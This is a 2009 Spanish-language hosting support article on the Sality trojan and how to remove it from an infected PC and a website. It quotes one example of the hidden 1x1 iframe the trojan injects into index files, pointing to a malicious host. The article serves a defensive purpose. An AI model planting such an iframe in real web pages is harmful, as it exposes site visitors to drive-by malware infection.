Acceso Clientes

Horario de Atención:
Lunes a Viernes de 9 a 18hs

Tel: 011-3221-2059 -
Fax: 011-3221-2100 Int. 2059

Como eliminar al troyano "Sality"
Jueves, 10 de Septiembre de 2009 10:00
En los últimos meses se ha propagado por internet un nuevo troyano llamado "Sality", que se encarga de infectar archivos .exe y src como así también de inyectar código malicioso en archivos HTML, PHP y ASP.

También obtiene información del equipo infectado (usuarios, contraseñas) y hasta desactiva algunas aplicaciones como antivirus y firewalls.

Lo que hace este troyano es agregar un iframe oculto a su sitio web con referencia a otro sitio infectado, para así propagar el virus e infectar más equipos; esto lo hace en HTML,  PHP o ASP, en archivos index principalmente.

El troyano agrega una linea similar a este ejemplo:

<iframe src="http:// xcvzvj .com:8080/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Solución

En primera instancia, si detecta una linea de iframe en el index de su web, lo primero que debe hacer es cambiar su contraseña de FTP, ya que esta es la forma o fue la forma en la que pudieron ingresar a su sitio para inyectar el código.

Luego debe realizar una limpieza de su computadora en busca de virus, spyware y malware, ya que si no elimina el troyano, no servirá de nada cambiar la contraseña de FTP, puesto que seguirá accediendo desde una computadora infectada y el troyano ya sabrá sus nuevos datos. Desafortunadamente, este virus también infecta archivos .exe de su pc y es muy probable que su antivirus ya no funcione para detectarlo. Así que lo recomendable es desinstalar el antivirus y volverlo a instalar. En otros casos este troyano puede compremeter archivos de sistema de Windows (ya que solo afecta este sistema operativo) y tal vez sea necesario formatear el equipo y reinstalar toda la información nuevamente.

Una vez que esté seguro de que ya ha eliminado el troyano o virus de su equipo puede proceder a eliminar las lineas de iframe que se encuentran en su index.

Entre las aplicaciones gratuitas para proteger su pc recomendamos las siguientes:

- Antivirus Avast (antivirus)

- Spybot S&D (antispayware)

- Zone Alarm (firewall)